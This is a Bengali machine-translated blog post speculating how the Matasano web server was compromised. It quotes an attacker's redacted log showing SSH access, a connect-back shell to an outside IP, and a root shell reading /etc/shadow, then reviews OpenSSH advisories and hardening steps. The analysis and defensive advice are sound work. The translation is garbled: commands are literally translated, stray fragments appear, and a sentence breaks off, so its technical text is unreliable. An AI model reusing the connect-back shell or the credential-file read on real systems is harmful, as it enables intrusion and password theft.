মাতাসানো কীভাবে হ্যাক হল?
পোস্টে থাকা তথ্য থেকে পুরো প্রকাশের কাছে উত্তর দেওয়া অসম্ভব। তবে অনুমান করা সবসময় আকর্ষণীয়, কারণ তারা কিছুটা দূরে তথ্য দেয় -
# ./th3_f1n4l_s0lut10n www.matasano.com
[-] 69.61.87.163:22 এ সংযুক্ত হচ্ছে ..
[/] বৈধ নন-রুট ব্যবহারকারী .. অ্যাডাম খুঁজছেন
******** R3D4CT3D h4h4h4h4 ********
তারা th3_f1n41_s01ut10n
মাতাসানো সার্ভারের বিরুদ্ধে তাদের বাইনারি " " চালায় যা ssh বন্দরের সাথে সংযোগ স্থাপন করে। এটি কিছু অজানা উপায়ের মাধ্যমে একটি বৈধ নন-রুট ব্যবহারকারীকে খুঁজে পায় এবং বাকি আউটপুটটি আবার redacted হয়।
# ./th3_f1n4l_s0lut10n -u অ্যাডাম -t 3 www.matasano.com
[*] কানেক্টব্যাক শ্রোতা 209.112.118.10:3338 এ ..
!
বাইনারিটি আবার পাওয়া যায় এমন ব্যবহারকারীর নাম ব্যবহার করে চালানো হয় যা লগ ইন করে 3338 পোর্টে তাদের সার্ভারের সাথে আবার সংযোগ স্থাপন করে (আশা করি এটি তাদের নামে নিবন্ধিত নয় ...)।
adam_at_www: ame ame uname -a
লিনাক্স www 2.6.20.1-1-686 # 1 এসএমপি সান মার্চ 4 12:44:55 ইউটিসি 2007 i686 জিএনইউ / লিনাক্স
**** h4h4h4hh4h4h4 l3tz us3 m0r3! 0D4Y! H4H4H4H4H4H4H4 ****
তারা বোঝাতে পারে যে এই কার্নেলের বিরুদ্ধে তাদের 0-দিনের রয়েছে যা আপনি যখন এই সংস্থার স্টক-ইন-ট্রেড বিবেচনা করেন তখন এটি বেশ পুরানো।
adam_at_www: ~ d সিডি / টিএমপি
*********** বি0আর 1 এনজি ***********
রুট_এট_উইউউইউ: ~ # বিড়াল / ইত্যাদি / ছায়া
ওফ - হঠাৎ ব্যবহারকারীর এখন রুট। / টেম্পে তাদের একটি স্থানীয় সুবিধাবঞ্চিত বৃদ্ধি শোষণ রয়েছে যা তারা উল্লেখ করা 0 দিনের হতে পারে।
সুতরাং এখানে কমপক্ষে দু'টি শোষণ চলছে - ওপেনএসএসএইচটি সিস্টেমটিতে বৈধ নন-রুট ব্যবহারকারী পেতে এবং সেই ব্যবহারকারী হিসাবে লগইন করতে, এবং তারপরে স্থানীয় সুযোগ-সুবিধা বৃদ্ধি esc
বিবেচনা করে বিবেচনা করুন যে ওপেনএসএইচ-এর সংস্করণ ৪.৫ থেকে কয়েকটি জানা সুরক্ষা সমস্যা রয়েছে:
থেকে OpenSSH- র নিরাপত্তা পৃষ্ঠা :
- সংস্করণ 5.2 এর পূর্বে ওপেনএসএইচ সিপিএনআই -957037 "এসএসএইচের বিরুদ্ধে প্লেইনটেক্সট রিকভারি অ্যাটাক" বর্ণিত প্রোটোকল দুর্বলতার পক্ষে ঝুঁকির মধ্যে রয়েছে। যাইহোক, উপলব্ধ সীমিত তথ্যের ভিত্তিতে এটি প্রদর্শিত হয় যে বর্ণিত এই আক্রমণটি বেশিরভাগ পরিস্থিতিতে অপ্রয়োজনীয়। আরও তথ্যের জন্য দয়া করে cbc.adv পরামর্শদাতা এবং ওপেনএসএসএইচ 5.2 রিলিজ নোট দেখুন।
- ওপেনএসএসএইচ 4.9 এবং আরও নবীনতর
~/.ssh/rc
অধিবেশনগুলির জন্য কার্যকর নয় যাঁর কমান্ডটি sshd_config (5) ফোর্সকমন্ড নির্দেশের সাথে ওভাররাইড করা হয়েছে। এটি একটি নথিভুক্ত, তবে অনিরাপদ আচরণ (ওপেনএসএসএইচ 4.9 রিলিজ নোটগুলিতে বর্ণিত)।
- ওপেনএসএইচ ৪.7 রিলিজ নোটে বর্ণিত হিসাবে ওপেনএসএইচ ৪. and এবং আরও অবিশ্বস্ত কুকি জেনারেশন ব্যর্থ হলে (যেমন ইচ্ছাকৃত সংস্থানজনিত ক্লান্তির কারণে) বিশ্বস্ত X11 প্রমাণীকরণ কুকিজ তৈরি করতে পিছনে পড়ে না।
আমার ধারণা এই লিনাক্স কার্নেলটি এবং পুরানো এসএসএইচ ডেমন তাদের জন্য করেছে। এছাড়াও, এটি তাদের www সার্ভারে চলছে, যা ইন্টারনেটে উপলব্ধ, যা আমার মতে করা বেশ আত্মবিশ্বাসের বিষয়। যে লোকেরা বিরতি পেয়েছিল তারা অবশ্যই তাদের বিব্রত করতে চেয়েছিল।
এই আক্রমণগুলি কীভাবে রোধ করা যায়?
প্র্যাকটিভ প্রশাসনের মাধ্যমে এটি প্রতিরোধ করা যেতে পারে - যে কোনও ইন্টারনেট-মুখোমুখি পরিষেবা প্যাচ করা হয়েছে তা নিশ্চিত করে, এবং যে কোনও জায়গা থেকে লোককে সংযোগ স্থাপনের পরিবর্তে সংযোগ করতে পারে এমন লোকের সংখ্যা সীমাবদ্ধ করে দেয়। এই পর্বটি এই পাঠটিকে সংমিশ্রিত করে যে সুরক্ষিত সিস্টেম প্রশাসন কঠোর এবং ব্যবসায়ের কাছ থেকে আইটেমিকে প্যাচ করার জন্য সময় দেওয়ার জন্য উত্সর্গ প্রয়োজন - বাস্তবে, এমন কিছু নয় যা সহজে ঘটে যায়, কমপক্ষে ছোট সংস্থাগুলিতে।
বেল্ট এবং-ধনুর্বন্ধনী পদ্ধতির ব্যবহার সর্বোত্তম - পাবলিক-কী প্রমাণীকরণ ব্যবহার করে, এসএসএস ডেমনটিতে শ্বেত তালিকাভুক্ত করা, দ্বি-ফ্যাক্টর প্রমাণীকরণ, আইপি নিষেধাজ্ঞাগুলি এবং / অথবা সমস্ত কিছু ভিপিএন এর পিছনে রেখে দেওয়া এটিকে লক করার সম্ভাব্য রুট।
আমি মনে করি আমি জানি যে আমি আগামীকাল কাজের সময়ে কী করব doing :)